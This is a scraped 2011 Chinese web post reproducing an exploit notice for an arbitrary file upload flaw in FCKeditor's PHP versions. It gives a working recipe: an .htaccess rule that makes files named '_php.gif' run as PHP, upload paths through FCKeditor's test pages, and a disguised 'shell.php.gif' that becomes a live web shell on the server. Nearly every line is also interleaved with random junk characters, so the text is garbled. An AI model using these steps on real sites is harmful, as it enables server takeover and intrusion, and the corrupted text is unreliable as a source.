FCKeditor所有php版本Upload上传漏洞
- P7 m$ r9 U5 F: D6 \+ K作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
$ d/ C; ?9 t1 k# X& w减小字体 增大字体
2 J9 `# H0 z& k9 f/ Y3 f3 z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
, A! P: e. i2 g% F: Z[+] Date: 2011
- m3 l5 b* D$ s" P$ j# v3 ~6 z) U[+] Author : sinesafe.cn
! n5 q# R; N1 g& D4 J[+] Website : WwW.sinesafe.cn
5 N; W, q2 ^, A% y9 \0 d———————————————————
& h6 F" M7 O: k9 `' a& u1.create a htaccess file:8 G" B' k* h5 ]4 D* @( @
code:
2 i& @/ K: |: w: q/ N* A<FilesMatch “_php.gif”>0 U# W3 J5 |, r7 `" F# j% L" Q
SetHandler application/x-httpd-php7 {& j. ^" L Z6 [
</FilesMatch>
. f. j6 F' g) v# n! X
: F' O" F+ N" P& M# v& A2.Now upload this htaccess with FCKeditor.! z9 u. _4 L* ]4 m! m% u
& F( \. L; V/ q( B$ w( I# n
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html- l$ G7 \* r2 m) Y0 j
7 ]1 R+ F$ @2 n1 f
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
0 x% J: N! v& C* J- B8 {2 _
+ |/ ^1 g7 |, U- d+ A. m- c# U———————————————————————————————-
/ @1 p7 m% P5 s& V3.Now upload shell.php.gif with FCKeditor.. {+ ]) c2 t+ G
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
. z' `) q4 P4 C* j9 t5.http://www.sinesafe.cn/anything/shell_php.gif
4 K+ d9 z0 v$ J' j: J1 \6.Now shell is available from server. |
6 T+ Q$ P4 M# I s% |( z D# |) g) C# Z
2 G! r; | Y d
|